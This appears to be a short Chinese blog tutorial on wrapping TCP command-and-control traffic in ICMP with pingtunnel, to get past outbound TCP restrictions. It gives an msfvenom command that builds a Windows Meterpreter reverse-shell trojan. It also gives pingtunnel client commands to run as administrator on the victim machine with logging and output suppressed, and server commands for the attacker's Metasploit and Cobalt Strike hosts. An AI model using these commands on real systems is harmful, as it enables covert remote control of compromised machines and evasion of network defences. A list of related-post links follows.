隧道技术-tcp封装icmp出网

1.背景:

目标出网限制tcp协议

2.msf木马转发上线

生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe

受害机器管理员权限执行:

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1

攻击机器执行:

./pingtunnel -type server

使用msf接受tcp协议木马会话

原理:

木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。

3.cs木马转发上线

cs创建监听器:

使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。

cs服务端执行:./ping -type server

受害机器执行:

pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、

相关推荐
长安11083 小时前
前后端、网关、协议方面补充
网络
南猿北者6 小时前
docker Network(网络)
网络·docker·容器
Hacker_Nightrain7 小时前
网络安全CTF比赛规则
网络·安全·web安全
网络安全指导员8 小时前
恶意PDF文档分析记录
网络·安全·web安全·pdf
co0t9 小时前
计算机网络(11)和流量控制补充
服务器·网络·计算机网络
白总Server9 小时前
JVM解说
网络·jvm·物联网·安全·web安全·架构·数据库架构
清尘沐歌9 小时前
有什么好用的 WebSocket 测试工具吗?
websocket·网络协议·测试工具
清尘沐歌9 小时前
有什么好用的 WebSocket 调试工具吗?
网络·websocket·网络协议
Li_0304069 小时前
Java第十四天(实训学习整理资料(十三)Java网络编程)
java·网络·笔记·学习·计算机网络